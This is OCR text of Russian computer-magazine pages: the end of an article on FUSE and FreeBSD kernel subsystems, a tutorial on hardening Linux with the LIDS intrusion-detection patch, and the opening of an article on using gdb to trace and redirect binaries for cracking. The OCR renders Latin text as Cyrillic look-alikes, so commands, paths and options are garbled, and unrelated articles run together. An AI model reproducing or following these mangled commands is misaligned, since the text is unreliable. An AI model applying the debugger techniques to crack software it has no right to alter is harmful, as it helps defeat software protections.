будь то іаг-архив или Йр-ресурс. 

3. Избежать включения в ядро лишнего кода. 

4 . Обеспечить возможность функциониро- 
вания ядра при возникновении критической 
ошибки в коде файловой системы. 

РІІ5Е состоит из трех компонентов: подсобной 
утилиты йізегтоипі, библиотеки ІіЫизе, пред- 
ставляющей интерфейс для программ, и мо- 
дуля ядра іизе.ко, связывающего библиотеку 
и ядро. РИЗЕ работает на манер стандартной 
подсистемы ѴРЗ ядра. При обращении к одно- 
му из файлов, ядро запускает функцию-обра- 
ботчик модуля іизе.ко, который пишет инфор- 
мацию о файле и инициированной операции в 
специальный сокет. Библиотека ІіЫизе в цикле 
читает данные из сокета и вызывает обработ- 
чик программы. Принцип обратного вызова 
процедур. Просто и элегантно. 

Интерфейс РІІЗЕ подтвердил свою жизнеспо- 
собность и востребованность уже несколько 
раз. Сначала он был включен в официальную 
ветку ядра Ыпих (с версии 2.6.14). Затем был 
перенесен в РгееВЗО. А сегодня на его основе 
строятся не только файловые системы, пре- 
доставляющие доступ к архивам и удаленным 
сервисам, но и серьезные ФС, вроде ех{2 (про- 
ект йізе-ех{2), ІЧТРЗ (проект пйз-3д) и даже 2РЗ 
(проект Ыз-Гизе, который находится в стадии 
разработки). Количество проектов, создан- 
ных на основе РІІЗЕ, стало просто огромным 
(смотри іизе.зі.пеР ). 

□ Эволюция с рожками 

Разработчики ВЗО-систем всегда придержива- 
лись более консервативных взглядов, нежели 
сообщество І_іпих. Это легко заметить, изучив 
историю развития, например, РгееВЗО. На- 
стоящих переломных моментов за все время 
существования этой ОС было меньше, чем в 
І_іпих. Минусом этот факт считать не стоит, так 
как разработка РгееВЗО ведется иным, отлич- 
ным от Ыпих, путем. В то время как в ядро Ыпих 
спешат включить как можно больше новейших 
технологий, пусть даже несовместимых между 



собой, разработчики РгееВЗО, напротив, стре- 
мятся придать механизмам ядра более универ- 
сальный характер, сделать ядро более цельным 
в плане архитектуры. 

□ ОеѵГз 

Виртуальная файловая система сіеѵіз была 
включена в ядро РгееВЗО версии 5.2. Она 
очень сходна с реализацией для І_іпих и 
решает ту же проблему — избавление от 
«бардака» в каталоге /беѵ. Кроме того, пре- 
дусмотрен специальный механизм, который 
в сочетании с демоном беѵсі позволяет на- 
значать файлам устройств произвольные 
имена и осуществлять какие-либо действия 
над подключенным устройством, вроде мон- 
тирования файловой системы ііазб-диска или 
настройки сетевой карты. 

□ ѲЕОМ 

Начиная с РгееВЗО версии 4.9, все операции 
ввода-вывода от файловой системы к драй- 
веру диска проходят через уровень (ЗЕОМ. 
В задачи этого уровня входит выполнение 
всевозможных преобразований запросов 
ввода-вывода, необходимых для расчленения 
диска на разделы, создания томов РАЮ или 
логических томов. При этом сам механизм 
(ЗЕОМ является объектно-ориентированным и 
позволяет разбить операции преобразования 
наобособленные классы, которые можно ком- 
бинировать. Например, существуют классы 
МВР и сІізкІаЬеІ (метка диска ВЗО). Соединив 
экземпляры этих классов в цепь, мы получим 
стандартное преобразование ввода-вывода, 
когда файловая система работает с разделом 
ВЗО, расположенным на стандартном разде- 
ле МВР. Есть еще класс, работающий с АТА- 
драйвером, его экземпляр будет находиться в 
самом конце цепи. 

Механизм ОЕОМ чрезвычайно гибкий и рас- 
ширяемый. Написать новый класс, позволяю- 
щий работать с дисковыми разделами Арріе 
или выполнять прозрачное шифрование, до- 
вольно просто, при этом изменять существую- 
щий код ядра не потребуется. Классы ОЕОМ 



можно комбинировать как угодно, создавая 
самые необычные конфигурации. ОЕОМ — это 
пример грамотного дизайна и результат нова- 
торской инженерной мысли. 

□ ЫеІдгарН 

ІМеідгарІі — это еще один пример использова- 
ния принципов ІЛЧІХ прямо в ядре ОС. ІЧеідгарН 
представляет собой сетевую подсистему ядра 
РгееВЗО, основанную на понятии простых 
модулей, при соединении которых можно со- 
здать сложные правила обработки сетевых 
пакетов. Модуль в терминологии пеідгарб 
называется узлом фобе), который при помо- 
щи крючков фоок) может быть «прицеплен» 
к другому узлу. Пакеты, проходя через узлы, 
подвергаются различной обработке, вроде 
инкапсуляции или модификации заголовков. 
Также предусмотрены сообщения, которые 
узлы могут посылать друг другу с целью орга- 
низации более сложной обработки пакетов. 
Некоторые узлы довольно просты, например 
пд_есИо (отправляет полученный пакет через 
тот же хук). Другие, как пд_Ьрі (выполняет 
фильтрацию пакетов аналогично ЬрТ), органи- 
зованы сложнее. 

ІЧеідгарН был включен в ядро 3.4 и нашел свое 
применение в маршрутизаторах, выполняю- 
щих сложные преобразования трафика. 

□ Взгляд в будущее 

А какие нововведения ждут нас в ближайшем 
будущем? Чего можно ожидать от следующих 
релизов Ыпих и РгееВЗО? Во-первых, это порт 
инновационной файловой системы 2РЗ прак- 
тически для всех представителей семейства 
ВЗО. О намерении включить код 2РЗ в свои ОС 
заявили разработчики ІЧеіВЗО, ОгадопРІуВЗО, а 
для РгееВЗО работы уже ведутся полным ходом. 
Во-вторых, включение кода дригпаі (поддержка 
журналирования на уровне ОЕОМ), сіігасе (мощ- 
ный трассировщик уровня ядра) и патчей для іаіі 
(поддержка ограничения памяти и процессора) 
в основную ветку ядра РгееВЗО. В-третьих, под- 
держка файловых систем геізег4 и ех{4 в ядре 
Ыпих. В общем, скучать не придется. ІНІ 
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і_т5 (і_ших іыткіібіоы оетестіоы бѵбтем) представляет собой мощнейшую систему обнаружения и защиты от втор- 
жения. ЗА СЧЕТ ИСПОЛЬЗОВАНИЯ Ы 05 У АДМИНИСТРАТОРА ПОЯВЛЯЕТСЯ МНОГО НОВЫХ ВОЗМОЖНОСТЕЙ ДЛЯ УВЕЛИЧЕНИЯ 
БЕЗОПАСНОСТИ иіЧІІХ. ЭТА СИСТЕМА ПОЗВОЛЯЕТ ОГРАНИЧИВАТЬ ДОСТУП К ФАЙЛАМ, ПАМЯТИ, БЛОЧНЫМ УСТРОЙСТВАМ, СЕ- 
ТЕВЫМ ИНТЕРФЕЙСАМ И ЗАПУЩЕННЫМ ПРОГРАММАМ, СКРЫВАТЬ ПРОЦЕССЫ ОТ ТАКИХ УТИЛИТ, КАК Р5, ТОР, Ь50Р, И ДАЖЕ 
ОПЕЧАТЫВАТЬ ЯДРО, ТО ЕСТЬ ЗАПРЕЩАТЬ ЗАГРУЗКУ И ВЫГРУЗКУ МОДУЛЕЙ ЯДРА. ПОМИМО ВСЕГО ПРОЧЕГО, В СОСТАВ ЬЮБ 
ВХОДЯТДЕТЕКТОР СКАНИРОВАНИЯ ПОРТОВ И ОТЛИЧНАЯ СИСТЕМАЖУРНАЛ ИРОВАНИЯ СОБЫТИЙ. СЕГОДНЯ МЫ НАСТРОИМ ЭТУ 
ЮЗ ТАКИМ ОБРАЗОМ, ЧТО ДАЖЕ ЕСЛИ ЗЛОУМЫШЛЕН НИ КУ УДАСТСЯ ВОСПОЛЬЗОВАТЬСЯ УЯЗВИМОСТЬЮ В СЕТЕВОМ ДЕМОНЕ 
И ЗАПОЛУЧИТЬ ПРАВА РООТ'А, ОН ВСЕ РАВНО НЕ СМОЖЕТ НАНЕСТИ НАШЕЙ СИСТЕМЕ СКОЛ ЬКО-НИБУДЬ СЕРЬЕЗНЫЙ УЩЕРБ. 



истема ЬЮЗ состоит из патча 
ядраи наборапользовательских 
утилит іісізіооіз. Все это можно 
скачать на сайте ѵѵѵѵѵѵ.іісіз.ога/ 
сіоѵѵпіоасі.іііппі . Наданный момент существу- 
ют патчи для ядер веток 2.4 и 2.6. Скачиваем 
соответствующий патч (в моем случае это 
ІісІз-2.2.1 ГС2-2.6.1 1 .бТаг.дг) и набираем следу- 
ющие команды: 

# ссі/изг/згс 



#іаг- 2 хѵЧісІз- 2 . 2 .х- 2 . 6 .х.Іаг.д 2 
#ссІ Ііпих-2.6. х 
#раісІп-р1 < 

/изг/згс/ІісІз-2.2.х-2.6.х/Іібз-2.2.х-2.6.х.раІсГі 
# таке теписопЛд 

Теперь приступим к конфигурированию 
ядра. Первым делом включаем поддержку 
алгоритма ЗНА256, необходимого для 
работы ЬЮЗ (меню СгуріодгарНу Орііопз/ 
Сгуріодгарбу АРІ). Убеждаемся, что не ус- 



тановлено расширенное использование 
возможностей (модуль сараЫІТу зесигіЩ 
тобиіе) и выключена ЗЕипих, иначе ЬЮЗ 
будет конфликтовать с этими механизмами. 
После этого устанавливаем опции самой 
ЬЮЗ, аименно: 

• іШеппр* ІЧо* *о Ріоогі І_одг (СОМРІО_ЕЮЗ_ 
ЫО_ЬООО_ЕОО) — ограничивает частоту 
протоколирования идентичных сообщений. 

• А11оѵ8ѵі*сЫпд*МеІ_РЗапгі5*а*е2(СОМРІО_ 
ЕЮЗ.АЬЬОѴѴ.ЗѴѴІТСН) — ЬРЗ (ЬЮЗЧгее 
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> СараЬіІіІіез и ЗЕЬіпих отключены 




> Поддержка Ы05 



зеззіоп, о ней мы поговорим чуть позже) 
позволяет админу выполнять команды 
без ограничений со стороны І_Ю$ (это 
небезопасно, но может быть полезно на 
начальной стадии конфигурирования). 
Я рекомендую включить эту опцию на пер- 
вые несколько дней, пока ты эксперимен- 
тируешь с І_Ю5, а потом, когда все будет 
настроено, выключить ее. 

# АПоѵ 8ѵі*сЬ Отт ТЬе І_іпих Рг €■■=■ Зеггіоп 
(СОМРІО_иОЗ_АИОѴѴ_ІР5) — позволя- 
ет выключить І_ЮЗ во время выполнения 
системы (как ты понимаешь, не очень хо- 
рошая идея). 

# РегТгісТ Могіе ЗѵіТсЬіпд То Зресіаі Тегтіпаіг 

(СОМРІѲ_ЕЮ5_РЕ5ТПІСТ_МОЭЕ_5ѴѴІТСН) 
— позволяет задать терминалы, с которых 
разрешается І_РЗ. Можно выбрать 3 класса 
терминалов: консоль (сопзоіе), последова- 
тельная консоль (зегіаі сопзоіе) и РТУ. Третий 
класс наиболее опасный, поскольку позво- 
ляет злоумышленнику удаленно запустить 
І_РЗ. Выбираем первый класс, позволяющий 
запускать І_РЗ только пользователям, физи- 
чески работающим с машиной. 

Сохраняем конфиги компилируем ядро: 

# таке Ь^Ітаде 

# таке тобиіез 

# таке тобиІез_іпзТаІІ 
#таке іпзТаІІ 

Копируем свежеиспеченное ядрышко в ка- 
талог/ЬооЕ 

# ср агсИ/і386/ЬооТ/Ь2Ітаде /ЬооѴЬгІтаде- 
2.6.хх-Іібз 

Теперь добавляем в дгиЬ.сопТ следующие 
строки: 

# ѵі /ЬооІ/дгиЬ/дшЬ.сопІ 

МІеШЗ 

гооІфсЮ.О) 

кегпеІ/Ьоо!/Ь2Ітаде-2.6. хх-Іібз го гооі = /сіеѵ/ігсіаб 
Не забываем при этом изменять свою корне- 



вую файловую систему (у меня это /беѵ/ІтсІа5). 
Если ты используешь І_ІІ_0, а не ОРЕІВ, то в 
файл /еіс/іііо.сопі нужно добавить: 

# ѵі /еіс/ІМо.сопІ 

ітаде=/Ьоо{/Ь2Ітаде-2.6. хх-Іібз 

ІаЬекТЮЗ» 

гооІ=/сІеѵ/ІтсІа5 

В случае с ЕНО, чтобы внесенные изменения 
вступили в силу, требуется перезаписать за- 
грузчик: 

# Міо 

□ Установка АСЬ 

Для нормальной работы І_ЮЗ нужно обно- 
вить и скомпилировать поддержку списков 
контроля доступа. Осуществляется это дву- 
мя командами: 

# ІісІзсопТ -II 

# ІісІзсопТ -С 

Осталось только перезагрузить компьютер: 
#геЬооІ 

Чтобы убедиться, что І_ЮЗ стартовала кор- 
ректно (должны появиться сообщения об 
инициализации АСЕ’ ов ЕЮЗ), после загруз- 
ки системы введем команду: 

#бтезд I ТаіІ -п 1 1 

□ Установка ІісЫооІз 

Следующий шаг — установка пакета 
ІісІзТооІз. Сценарию ./сопіідиге следует явно 
передать абсолютный путь до каталога с на- 
шим ядром: 

# Таг - 2 ѵхІ ІібзЮоІз-2.2.5 

# сб ІісІзТооІз-2.2.5гс1 .Іаг.дг 

#./соп!ідиге КЕВЫЕЕ_ОІВ=/изг/згс/Ііпих-2.6.7 

# таке 

# таке іпзТаІІ 



При выполнении цели таке іпзТаІ I тебя 
попросят ввести пароль для администри- 
рования ЕЮЗ, он не должен совпадать с 
паролем гооЕ 

Все, снова отправляем компьютер на пере- 
загрузку: 

• гебооі 

Мы уже рассмотрели процедуру построе- 
ния нового ядра, поэтому сейчас займемся 
конфигурированием пользовательского 
уровня. Система ЕЮЗ позволяетуправлять 
взаимодействием процессов и файлов в 
системе. Кроме этого, ЕЮЗ предоставляет 
двеоченьполезныефункции: ЕРЗи «опеча- 
тывание» ядра. 

□ Сессии без І-ШЗ 

ЕРЗ представляет собой своеобразную 
оболочку, на выполнение команд кото- 
рой не накладываются ограничения ЕЮЗ. 
Это позволяет администратору работать 
в системе как обычно, без выключения 
основной системы безопасности, так как 
если ЕЮЗ функционирует, то ограниче- 
ния накладываются даже на пользовате- 
ля гооЕ Однако ЕРЗ потенциально опасна: 
если злоумышленнику удастся получить 
доступ к ЕРЗ, то он будет иметь полный 
контроль над системой — вплоть до отклю- 
чения ЕЮЗ. Доступ к ЕРЗ контролируется 
установленным ранее паролем. Дополни- 
тельно при конфигурации ядра можно ука- 
зать терминалы, с которых разрешается 
доступ к ЕРЗ. 

Обычно ЕРЗ используется админом для 
редактирования файлов в каталоге 
/еіс/іібз, который недоступен во время 
работы ЕЮЗ даже пользователю гооЕ Как 
правило, в этом каталоге находятся следу- 
ющие файлы: 

• Іібз.сар — ограниченный набор возмож- 
ностей; 

• Іібз.сопі — АСЕ (будет рассмотрен позже); 

• Іісіз.рѵѵ — пароль администратора ЕЮЗ; 

• Іібз.іпі — начальные конфигурационные 
значения. 
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> Включение алгоритма 5НА256 



О «Опечатывание» ядра 

С одной стороны, загружаемые модули очень 
полезны, так как могут быть прилинкованы 
к ядру прямо во время работы ОС. С другой 
стороны, злоумышленник может добавить к 
ядру свои собственные модули, что никак не 
входит в наши планы. Для предотвращения 
подобных ситуаций І_ЮЗ предлагает кон- 
цепцию «опечатывания» ядра, препятству- 
ющего чьей-либо загрузке/выгрузке модуля. 
Опечатать ядро можно с помощью команды 
Іібзабт -I. Эту команду следует поместить в 
сценарии загрузки системы. При этом важно 
убедиться, что все необходимые модули за- 
гружены до выполнения команды Іісізасіт -I. 

□ Знакомьтесь, Іісізасіт 

Администрирование І_Ю5 выполняется с 
помощью Іісізасіт. Перечислю основные 
опции этой утилиты: 

-Р — зашифровать пароль І_ЮЗ (например 
«Іісізасіт -Р тураззѵѵогсі»); 

-5 — изменить аспект защиты І_ЮЗ; 

-I — опечатать ядро (для этой опции не ну- 
жен пароль); 

-V — просмотреть состояние системы. 
Ключ -3 используется вместе с одним из 
следующих флагов: 

• І_ЮЗ_СІ_0ВАІ_ — включить/выключить 
І_ЮЗ глобально; 

• РЕ1_0А0_С01ЧР — перезагрузить файл Іібз.сопі 
и обновить список защищенных инодов; 

• І_Ю5 — включить/выключить І_ЮЗ ло- 
кально, то есть создать І_РЗ; 

• АСІ__0І5СОѴЕКѴ — используется для от- 
ладки; когда включен, нарушения правил 
не запрещаются; 

• ЗНЫТ00У1Ч — переключается в состоя- 
ние зНиісІоѵѵп. 

Перечисленные флаги должны предва- 
ряться знаком «+» (включить) или «-» (вы- 
ключить). Приведу две полезные команды 
(вход в І_РЗ и выключение І_ЮЗ): 

«# Іісізасіт -5--ШЗ» 

«# Іісізасіт -3 - -І_ЮЗ_ОІ_ОВАІ_» 



□ Поговорим об АСЬ 

АСЬ используется для управления досту- 
пом к различным объектам, например к 
файлам. В І_ЮЗ есть два типа АСЬ: АСЬ 
файлов, контролирующий доступ к фай- 
лам и каталогам, и АСЬ возможностей, ре- 
гулирующий возможности исполняемых 
файлов. 

І_ЮЗ определяет4 режима для объектов: 

• 0ЕІЧѴ — доступ к файлу запрещен; 

• КЕА0 — объект может быть открыт в ре- 
жиме «только чтение», запись запрещена; 

• АРРЕ1Ч0 — объект может быть открыт для 
чтения или добавления информации, этот 
режим удобно использовать для файлов 
журналов; 

• ѴРІТЕ — операции чтения и записи не 
ограничиваются, І_ЮЗ не защищает этот 
файл. В І_ЮЗ АСЬ описывается следующим 
образом: 

<Тип АСІ_> <субъект> <объект> <доступ> снасле- 
дование> 

Тип АСЬ определяет, на какой стадии ра- 
боты системы будет контролироваться до- 
ступ кней. Есть 4типаАСІ_: 

• ВООТ — доступ будет контролироваться 
на стадии загрузки системы; 

• РО5ТВ00Т — после загрузки системы; 

• 5НІЛ0ОѴМ — перед перезагрузкой (за- 
вершением работы); 

• пиіі — контроль доступа не зависит от 
стадии работы системы. 

Обычно тип АСІ_ не указывается, то есть по 
умолчанию применяется значение пиіі для 
постоянного контроля доступа, а первые 
3 типа используются для ослабления оп- 
ределенных ограничений. Субъект — это 
приложение, которому предоставляется 
доступ (режимы доступа описаны выше) 
к объекту, например файлу или каталогу. 
Последнее поле — наследование — опре- 
деляет, будет ли АСІ_наследоватьсядочер- 
ними процессами или нет, и может прини- 
мать значения О, 1 и-1. 



АСІ_хранятсяв/е{с/ІісІз/ІізсІ.соп{.Прямоередак- 
тирование этого файла невозможно. Чтобы 
внести изменения, следует воспользоваться 
ІісІзсопТ Перечислю наиболее важные опции 
этой утилиты: 

-А, --асИ — добавить запись; 

-С, — сЬеск — проверить существующие записи; 
-О, — — удалить запись; 

-Е, — гего — удалить все записи; 

-и, — ирсіа+е — обновить /беѵ и номера инодов; 
-І_, — 1І5* — вывести все записи; 

Выведи все записи и обрати внимание на пра- 
вила для каталога /еіс: 

#ІісІзсопПІ_ 

Апуіііе НЕАООІ\ІІ_Ѵ:0 

АпуЛІе ОЕІ\ІѴ:0 

Апуйіе ОЕ1\1У:0 

/Ьіп/Іодіп НЕАООІ\ІІ_Ѵ:0 /еІс/зГіасІоѵѵ 

Сначала /еіс объявляется как ВЕАЭОІ\ІІ_У (толь- 
ко чтение), затем объекты /еіс/іісіз и /еіс/збасіоѵѵ 
делаются невидимыми (ЭЕІЧУ). Поскольку 
субъект не указан (Апу Тііе — любой файл), то 
ограничение применяется к любому процес- 
су. Из последней строки видно, что субъекту 
/Ьіп/Іодіп предоставляется доступ только для 
чтения к файлу /еіс/збасіоѵѵ. 

Для добавления новых записей используется 
опция -А программы ІісІзсопТ: 

# ІісІзсопТ -А [тип АСІ_] [-з субъект] -о объект [-1 с-по] \ 

[-і уровень] -\ действие 

Кпримеру: 

# ІісІзсопТ -А -о/еіс/Гюзіз.соп^ -\ НЕАй 

Опция [-! с-по] позволяет установить время 
действия правила. Время указывается в фор- 
мате ЧЧММ-ЧЧММ. 

Для удаления записи используется 
синтаксис: 

# ІісІзсопТ -й [тип АСЬ] [-з субъект] [-о объект] 



/еіс 

/еТс/ІісІз 

/еіс/зГіасІоѵѵ 
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Здесь можно указать субъект, объект, либо 
тип АСЬ — будут удалены все совпадающие 
правила. 

□ Особые возможности І_Ю5 

Помимо всего прочего, І_Ю5 предоставляет 
две интересные возможности: 

• САР_НЮОЕИ: процессы с установленной 
возможностью САР_НІСЮЕІ\І не отобража- 
ются в /ргос, что позволяет скрыть их от таких 
программ, как рз, Іор и ІзоТ; 

• САР_ІІЧІТ_Кіи_: если эта возможность для 
демона выключена, то он может игнорировать 
сигнал ЗЮКІІ_І_. 

САР_НЮЭЕІ\І не гарантирует, что процесс бу- 
дет полностью невидим. Например, сетевой де- 
мон можно обнаружить с помощью пеізіаі или с 
помощью сканера портов, а также по наличию 
файла /ѵаг/гип/ название, рісі. 

І_ЮЗ немного модифицирует возможность 
САР_ВІМЭ_І\ІЕТ_ЗЕВѴІСЕ. Обычно эта воз- 
можность включается для процесса, кото- 
рому нужно «привязаться» к привилегиро- 
ванному порту (с номером 0-1024). Но І_ЮЗ 



• САР_КІІ_І__РРОТЕСТЕО: возможность «уби- 
вать» защищенные процессы. 

Например, система Х.Огд требует возмож- 
ность САР_ЗУЗ_РАѴѴІО, поэтому если ты ис- 
пользуешь графический сервер, установи 
ее для исполняемого файлах. 

□ Установка 

и модификация возможностей 

Установка возможностей производится с помо- 
щью все той же утилиты ІісІзсопТ. Добавить новую 
возможность можно точно так же, как новое прави- 
ло для файла. Синтаксис аналогичен , единствен- 
ное отличие — используется действие ОВАЫТ. 
Добавим возможность запуска Х.Огд: 

# ІісІзсопТ -А -з /изг/ХІ 1/Ьіп/Х -о САР_ЗѴЗ_НАѴѴІО \ | 

ОНАІЧТ 

А теперь разрешим ѴѴеЬ-серверу АрасЬе при- 
вязываться к непривилегированному порту: 

#ІісІзсоп1 : -А-з/изг/зЬіп/ІпйрсІ-о САР_ВІІ\Ю_І\ІЕТ_5ЕРІѴІСЕ 
-\ ѲРАІЧТ 



этом каталоге требуют доступ в режиме 
«только чтение», поэтому сначала мож- 
но установить для всего каталога режим 
РЕАООЫ1_У, а затем разрешить доступ к 
некоторым отдельным файлам в ѴѴРІТЕ, 
глобально или для определенных субъек- 
тов. Здесь наиболее важными файлами яв- 
ляются раззѵѵсі/раззѵѵсі- и збасіоѵѵ/зі'іасіоѵѵ-: 
нужно запретить доступ к этим файлам 
(ЭЕИХ) всем субъектам, кроме субъектов 
/Ьіп/Іодіп, зи и/изг/зЬіп/ззЬсІ, им полагается 
доступ ВЕАЭОІ\ІІ_Ѵ. 

Но мы еще не учли утилиту /изг/Ьіп/ 
раззѵѵсі. Ей нужен ѴѴРІТЕ-доступ к файлу 
/еіс/збасіоѵѵ, чтобы пользователь мог изме- 
нить свой пароль. Ирония заключается втом, 
что при смене пароля файл /еіс/зИасІоѵѵ со- 
здается заново, а не просто модифицирует- 
ся, в результате чего изменяется инод (іпобе) 
файла. А поскольку І_ЮЗ привязывается не к 
имени, акинодуфайла, послеегоизменения 
І_ЮЗ уже не будет защищать сам файл. 
Кроме этого, программе раззѵѵсі нужно 
предоставить ѴѴРІТЕ-доступ ко всему ка- 



«Е ели по какой-то причинетебе потребовалось отключить І_Ш5, 
то при загрузке системы передай ядру параметр зесигі1у=0» 



расширяет синтаксис этой возможности, 
позволяя указывать порт или диапазон 
портов, к которым разрешена «привязка» 
процесса. 

□ Ограниченный набор возможностей 

Ограниченный набор возможностей — это 
список возможностей, которые доступны 
процессу в системе (но необязательно ус- 
тановлены). Если какая-то возможность не 
указана в этом списке, ее нельзя назначить 
процессу. 

Соответственно, для каждого процесса мож- 
но определить свои списки возможностей. 
Конфигурация І_ЮЗ по умолчанию (/еіс/іісіз. 
сар) разрешает все возможности, кроме 
следующих: 

• САР_5ЕТРСАР: возможность устанавли- 
вать возможности другого процесса (масло 
масляное, но это так); 

• САР_5Ѵ5_МО0І_ІІ_Е: возможность загру- 
жать и выгружать модули ядра; 

• САР_9Ѵ5_РАУЮ: возможность прямого 
ввода/вывода, то есть доступа к файлам 
/беѵ/рогі, /сіеѵ/тет, /сіеѵ/ктет, а также 
прямого доступа к дискам; 



Более безопасным будет вариант разреше- 
ния привязки АрасЬе кпортам 80 и 443: 

# ІісІзсопТ -А -з /изг/зЬіп/ГійрсІ \ 

-о САР_ВІІ\Ю_І\ІЕТ_ЗЕРІѴІСЕ 80-80,443-443 -\ ОВАІЧТ 

Синтаксис команды требует указания диа- 
пазона портов, поэтому, чтобы задать один 
порт (к примеру, 80), нужно ввести «80-80». 

□ Практика 

Вот теперь можно приступить к защите ОС 
І_іпих. Разработка АСІ_ для всей системы 
— непростая и объемная задача, поэтому 
я рекомендую создать зЬеІІ-сценарий, со- 
держащий вызовы ІісІзсопТ. Первой коман- 
дой будетІісІзсопІ-2. Эта директиваудаляет 
все ранее существующие АСІ_. Сценарий 
можно поместить в /еТс/ІісІз, что сделает его 
невидимым за пределами І_Р5-сессии. 
Какие же системные файлы и каталоги тре- 
буют защиты І_ЮЗ? В первую очередь необ- 
ходимо защищать содержимое каталогов 
/Ьіп, /зЫп, /ІіЬ, /изг/Ьіп, /изг/ПЬ, /изг/зЬіп и 
конфигурационные файлы в каталоге /еіс. 
Подавляющее большинство конфигов в 



талогу /еіе, поскольку запись файла — это 
изменение каталога. Если на месте раззѵѵсі 
окажется бинарик злоумышленника, то он 
сможет получить доступ ко всем файлам в 
каталоге /еіс. К сожалению, не существует 
простого способа решения этой пробле- 
мы: нужно либо использовать альтерна- 
тивную схему аутентификации, например 
ЮАР, либо открыть ѴѴРІТЕ-доступ к /еіс. 
Есть, правда, еще один способ, самый 
безопасный, но очень неу добный для ад- 
министратора. Заключается он взапреще- 
нии ѴѴЯІТЕ-доступа к /еіс. Для того чтобы 
изменить свой пароль, пользователь дол- 
жен будет обратиться непосредственно к 
админу. 

Чтобы определить, к каким файлам и ката- 
логам нужно обращаться тому или иному 
приложению, необходимо отслеживать 
системные вызовы ореп(), сИсІіг(), тксІіг() 
и т. д. Немного облегчить эту задачу позво- 
ляет БЮЗ-РАО, расположенный по адресу 
ѵѵѵѵѵѵ.ІісІз.ога/ІісІз-Іад/ІісІз-Іад.ЫтІ . В нем ты 
найдешь АСЬ для различных приложений: 
Іодіп, зи, МуЗОІ_, ВІ N Э, ОрепЗЗН, АрасИе. 
Удачи. =Н= 
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КРИС КАСПЕРСКИ 



ПОКОРЕНИЕ ВЕРШИН 
ОТЛАДКИ 

В ЭТОЙ СТАТЬЕ МЫ ПРОДОЛЖИМ НАШЕ ПОГРУЖЕНИЕ В 60В, ИССЛЕДУЯ ЕГО ВОЗМОЖНОСТИ С ТОЧКИ ЗРЕНИЯ ХАКЕРА, ОТЛА- 
ЖИВАЮЩЕГО ДВОИЧНЫЕ ФАЙЛЫ БЕЗ ИСХОДНЫХ ТЕКСТОВ. МЫ РАССМОТРИМ ТЕХНИКУ ИЗМЕНЕНИЯ ПОТОКА ВЫПОЛНЕНИЯ 
ПРОГРАММЫ, ТОЧКИ ОСТАНОВА И НАБЛЮДЕНИЯ, МЕХАНИЗМЫ ТРАССИРОВКИ И СРЕДСТВА РАБОТЫ С ПАМЯТЬЮ. В ОБЩЕМ, 
ВСЕ ТО, ЧТО ДЕЛАЕТ ВЗЛОМЩИКОВ СЧАСТЛИВЫМ И ЛЮДЬМИ. 



ТРАССИРОВКА ВО ТЬМЕ С ЗАВЯЗАННЫМИ ГЛАЗАМИ 



рограмма, загруженная ко- 
мандой ТМе (или указанная в 
командной строке), находится 
в бесформенном состоянии, 
представляющем собой всего лишь сово- 
купность байт, записанных в выделенном 
регионе адресного пространства. Новый 
процесс для нее еще не создан, и трасси- 
ровать ее невозможно. Во всяком случае, 
пока мы не дадим команду шп или г, которой 
обычно предшествует установка точки ос- 
танова на функцию таіп или зіагі. Будучи 
запущенной, программа будет работать 
до тех пор, пока не встретит точку остано- 
ва или не получит зіор-сигнал (см. раздел 
«Обработка сигналов»). Применение ко- 
манды гип к уже запущенной программе 
приведет к ее перезапуску (в конфигура- 
ции по умолчанию отладчик запрашивает 
подтверждение). 

Продолжить работу программы, останов- 
ленной по точке останова или по сигналу, 



можно командой сопііпие (с), действующей 
также, как и гип, то есть работающей до 
сигнала/точки останова. 

Чтобы передать управление по произволь- 
ному адресу, необходимо сделать фтр {]), 
за которым следует адрес, имя функции 
или регистр. В частности, \ *$рс по своему 
действию аналогична команде сопііпие, 
\ Тоо передает управление на метку/фун- 
кцию іоо (если только она присутствует в 
таблице символов), а \ *0х80484АА прыгает 
на адрес 80484ААН. Если одни и те же ад- 
реса используются многократно, их можно 
загнать в пользовательскую переменную 
командой зеі $ту_Юо=0х80484АА, а затем 
использовать ее в качестве параметра ко- 
манды фтр — \ *$ту_Юо. Кстати, отладчик 
ЗоііІСЕ ничего подобного делать не умеет! 
Команда ипііі (и) продолжает выполнение 
программы вплоть до указанного адреса 
(например, и *0х080484ЕО), при достиже- 
нии которого останавливается и передает 



управление отладчику. КакЩиптр, команда 
ипііі поддерживает работу не только с мет- 
ками и адресами, но и с переменными, зна- 
чительно упрощая взлом. Без аргументов 
ипііі аналогична команде пехіі (см. раздел 
«Трассировка») — она переходит на следу- 
ющую машинную команду, пропуская фун- 
кции и циклы. 

Рассмотрим фрагмент цикла, демонстриру- 
ющего сущность команды ипііі 

; на выход из цикла 

. іехі:080484ЕВ ІЬ зГіоЛ Іос_80484ЕР 

; к началутела цикла 

. іехі:080484ЕБ ітр зіпогі Іос_8048532 

; первая команда за концом цикла 
. іехі:080484ЕЕ Іеа еах, [еЬр + ѵаг_28] 

КомандаипііІ, отданная на строке 80484ЕВІТ, 
равносильна и *0х80484ЕР — она выполняет 
цикл и передаетуправление отладчику толь- 
ко по выходу из него. Очень удобно! 









Если нам необходимо дождаться выходаиз 
функции, автоматически остановившись 
при встрече с НЕТ, то на этот случай пре- 
дусмотрена команда ііпізіі, аналогичная 
команде Р РЕТ отладчика ЗоііІСЕ. 

Вместо пошаговой трассировки програм- 
мы, дсІЬ просматривает фрейм предыду- 
щей функции (это можно сделать командой 
Ьаскігасе или Ьі) и устанавливает точку 
останова на адрес возврата, что обеспе- 
чивает максимальную эффективность 
выполнения. Но если отладчику неудастся 
раскрутить стек и восстановить цепочку 
фреймов, тогда команда ТіпізИ не сможет 
работать. 

Команда геШгп, в отличии от Тіпізіп , приво- 
дит к немедленному возвращению в мате- 
ринскую функцию без выполнения остав- 
шегося «хвоста». ЗоііІСЕ этого делать не 
умеет, а зря! геіигп очень полезна и доволь- 
но часто используется при отладке. 

Еще ЗоііІСЕ не умеет вызывать функции, 
а дсІЬ это делает без всякого напряжения 
командой саМ , за которой следует имя 
функции/переменная/регистр или адрес. 
Аргументы, если они есть, передаются 
в круглых скобках по Си-соглашению, то 
есть заносятся в стек справа налево и вы- 
талкиваются из стека все той же коман- 
дой саІІ, например: саІІ іоо (1,2,3) или саІІ 
0x8048384(1,2,3). 

При желании можно даже выполнить ко- 
манду оболочки, не выходя из отладчика. 
Это делается так: зііеІІ Із или зііеІІ тап 
ореп. Фантастически удобно! Впрочем, 
аналогичного результата можно добиться, 
открыв дополнительную консоль. 



□ Трассировка 

С трассировкой связаны всего две ко- 
